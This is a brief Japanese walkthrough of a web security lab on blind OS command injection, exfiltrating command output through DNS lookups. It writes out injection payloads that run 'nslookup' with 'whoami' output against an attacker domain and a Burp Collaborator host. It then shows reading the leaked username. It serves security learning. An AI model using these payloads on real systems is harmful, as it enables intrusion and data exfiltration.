Hello there, ('ω')ノ

 

帯域外チャネルは、挿入されたコマンドから出力を抽出する簡単な方法を提供して。

whoamiで、コマンドの結果を含む攻撃者のドメインでDNS lookupが発生して。

例えば、下記のように。

　& nslookup `whoami`.kgji2ohoyw.web-attacker.com &

 

まずは、フィードバックを送信して。

 

 

該当するリクエストをリピータへ。

 

 

コラボレータのペイロードをコピーして。

 

 

下記をパラメータに追加してSendすると。

　||nslookup+`whoami`.qqkzubmlegqqe32esgz5c089x03qrf.burpcollaborator.net||

 

 

ペイロードの結果として。

アプリケーションによって開始されたいくつかのDNS相互作用が表示されて。

コマンドからの出力がインタラクションのサブドメイン（下のエリア）に表示されて。

検索された完全なドメイン名は、Descriptionタブに表示されて。

 

 

検索されたドメイン名をDNS queryタブからコピーして。

　peter-I4mu2s

 

 

入力すると。

 

 

クリアできた。

 

 

Best regards, (^^ゞ